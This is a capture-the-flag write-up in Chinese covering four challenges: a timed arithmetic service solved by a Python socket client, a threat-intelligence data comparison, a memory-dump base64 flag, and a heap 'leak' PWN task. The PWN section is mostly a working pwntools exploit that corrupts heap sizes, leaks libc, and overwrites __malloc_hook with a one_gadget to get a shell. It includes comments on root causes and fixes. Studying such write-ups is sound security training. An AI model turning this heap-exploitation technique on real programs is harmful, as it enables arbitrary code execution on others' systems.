Crypto-py-math-game
nc连接测试
根据题目要求,需在三秒内给出答案才能输出flag值
利用python编写exp进行处理
Exp:
import socket
import re
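# Client for the timed "math game" service: read the banner, compute the
# requested expression for the announced n, send the answer, then relay
# whatever the user types until the session ends.

# Raw strings, so "\d" and "\?" reach the regex engine instead of being parsed
# as (invalid) string escapes.
com = re.compile(r"n = (\d.*)")
# After "X" is mapped to "*", the expression may contain only the variable n,
# digits, whitespace and basic arithmetic operators.
allowed_expr = re.compile(r"[n0-9\s+\-*/%()]+")

# AF_INET / SOCK_STREAM replace the magic numbers 2 and 1.  The with-block
# closes the socket on every exit path; the original close() sat behind an
# endless loop and was never reached.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as c:
    c.connect(("39.104.54.154", 33057))
    # NOTE: a single recv() is assumed to return the whole banner.
    name = c.recv(1024).decode()
    print(name)

    yunsuan = re.search(r"(n.*) = \?", name)
    n_match = com.search(name)
    if yunsuan is None or n_match is None:
        raise ValueError("unexpected banner: missing 'n = <value>' or '<expr> = ?'")

    yn = yunsuan.group(1).replace("X", "*")
    n = int(n_match.group(1))

    # SECURITY: yn is text chosen by the remote service and is evaluated as
    # Python below.  Without a check, a hostile or compromised server could run
    # arbitrary code on the machine running this client.  The character
    # allowlist is the real control (no attribute access, no names other than
    # runs of "n"); the empty builtins and the n-only namespace are defence in
    # depth.  Residual risk: chained "**" can still burn CPU or memory, so run
    # clients for untrusted services in a throwaway VM or container.
    if allowed_expr.fullmatch(yn) is None:
        raise ValueError(f"refusing to evaluate unexpected expression: {yn!r}")
    answer = eval(yn, {"__builtins__": {}}, {"n": n})

    # sendall() retries partial writes; send() may transmit only part of the data.
    c.sendall((str(answer) + "\n").encode('utf-8'))
    ddd = c.recv(1024)
    print(ddd.decode())

    # Manual relay: stop when stdin ends or the server closes the connection
    # (recv() returning b"") instead of looping forever.
    while True:
        try:
            line = input()
        except EOFError:
            break
        c.sendall(line.encode('utf-8'))
        ddd = c.recv(1024)
        if not ddd:
            break
        print(ddd.decode())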
Flag:flag{35946f7510}
MISC-威胁情报分析2
对两个文件进行数据对比,利用python编写脚本对数据文件进行分析
发现可疑数据
Flag:flag{lprbriry.net}
MISC-内存取证
直接将lm-lime文件用HxD打开并进行检索,得到flag经base64编码后的字符串
对base64进行解码得flag
Flag:flag{12qwaszxcde3}
PWN-leak
分析
跟进sub_9BF()
sub_ABC()
EXP:
from pwn import *
def s(a):
    """Send ``a`` over the connection ``p`` unchanged (wraps ``p.send``)."""
    p.send(a)
def sa(a, b):
    """Wait for the delimiter ``a`` on ``p``, then send ``b`` (wraps ``p.sendafter``)."""
    p.sendafter(a, b)
def sl(a):
    """Send ``a`` as one line over ``p`` (wraps ``p.sendline``)."""
    p.sendline(a)
def sla(a, b):
    """Wait for the delimiter ``a`` on ``p``, then send ``b`` as a line (wraps ``p.sendlineafter``)."""
    p.sendlineafter(a, b)
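def r():
    """Receive whatever is available on ``p`` and return it.

    The original one-liner dropped the result of ``p.recv()`` and always
    returned ``None``; callers that ignore the return value are unaffected.
    """
    return p.recv()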
def pr():
    """Receive whatever is available on ``p`` and print it."""
    data = p.recv()
    print(data)
def rl(a):
    """Read from ``p`` up to the delimiter ``a`` and return the data (wraps ``p.recvuntil``)."""
    data = p.recvuntil(a)
    return data
# pwntools global settings: Linux / amd64 target, debug-level logging.
context(os='linux', arch='amd64', log_level='debug')
# Local run against the challenge binary, left disabled by the author.
#p = process('./leak')
# NOTE(review): host and port are blank on the page (apparently redacted);
# the challenge endpoint has to be supplied here before this call can connect.
p = remote('', )
# Local copies of the challenge binary and its libc. Only libc.sym is used in
# the visible part of the script; elf is loaded but not referenced.
elf = ELF('./leak')
libc = ELF('./libc-2.27.so')
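def add(idx, size):
    """Answer three consecutive ``': '`` prompts with ``1``, ``idx`` and ``size``.

    The numbers are ASCII-encoded before sending, so every payload handed to
    the connection is bytes like the prompts. Passing ``str`` makes pwntools
    guess an encoding and emit a warning.
    """
    sla(b': ', b'1')
    sla(b': ', str(idx).encode())
    sla(b': ', str(size).encode())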
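def edit(idx, data):
    """Answer the ``': '`` prompts with ``2`` and ``idx``, then send ``data`` raw.

    ``data`` goes out through ``sa`` (no newline appended), so the caller
    controls the exact bytes written. ``idx`` is ASCII-encoded so that only
    bytes are handed to the connection.
    """
    sla(b': ', b'2')
    sla(b': ', str(idx).encode())
    sa(b': ', data)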
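def show(idx):
    """Answer the ``': '`` prompts with ``3`` and ``idx``; the reply is read by the caller.

    ``idx`` is ASCII-encoded so that only bytes are handed to the connection.
    """
    sla(b': ', b'3')
    sla(b': ', str(idx).encode())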
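def free(idx):
    """Answer the ``': '`` prompts with ``4`` and ``idx``.

    ``idx`` is ASCII-encoded so that only bytes are handed to the connection.
    Not called anywhere in the visible part of the script.
    """
    sla(b': ', b'4')
    sla(b': ', str(idx).encode())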
# NOTE(review): the steps below depend on the exact order and sizes of the
# requests. The numeric offsets are hard-coded for the libc-2.27.so build
# loaded earlier, and the page does not show how they were derived.

# Slot 0 is requested with 0x18 bytes, but edit() then writes 0x20: the last
# qword (0xd91) lands past the requested size. Presumably edit() in the target
# does not bound writes to the allocation size -- confirm against the binary.
add(0, 0x18)
edit(0, p64(0)*3 + p64(0xd91))
# Two further requests, then ask the service to print slot 2.
add(1, 0x1008)
add(2, 0xd50)
show(2)
# Keep the 6 bytes ending at the first 0x7f byte of the reply, zero-pad them to
# 8 bytes and unpack them as one 64-bit value, treated below as a libc pointer.
x = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# Fixed distance from the leaked value to the libc load address.
libc_base = x - 0x3ec2a0
malloc_hook = libc_base + libc.sym['__malloc_hook']
# Hard-coded libc offset; only meaningful for this exact libc build.
one_gadget = libc_base + 0x10a2fc
# Same pattern as slot 0: 0x1008 bytes requested, 0x1010 written, with the
# extra qword set to the maximum 64-bit value.
edit(1, b'\x00'*0x1008 + p64(0xffffffffffffffff))
# A negative size is sent and, judging by the steps that follow, accepted by
# the target -- size validation looks missing as well (TODO confirm).
add(3, - 0x22010)
add(4, 0x100)
edit(4, b'\x07'*0x30 + p64(malloc_hook)*0x10 + b'\n')
add(5, 0xa0)
# Writes the one_gadget address through slot 5. Presumably slot 5 now overlaps
# __malloc_hook, so the next allocation request (slot 6) diverts execution.
edit(5, p64(one_gadget) + b'\n')
add(6, 0x200)
# Hand the session over to the user's terminal.
p.interactive()
# Defender's view: the root causes visible in this script are writes past the
# requested size and an unchecked negative size. If, as it appears, the
# overwritten qwords are top-chunk size fields, glibc 2.29+ aborts on that
# corruption, and glibc 2.34 removed __malloc_hook. Bounding edit() to the
# allocation size and validating sizes in the program remains the actual fix.
Flag:flag{8ac27ed206}
Flag:flag{8ac27ed206}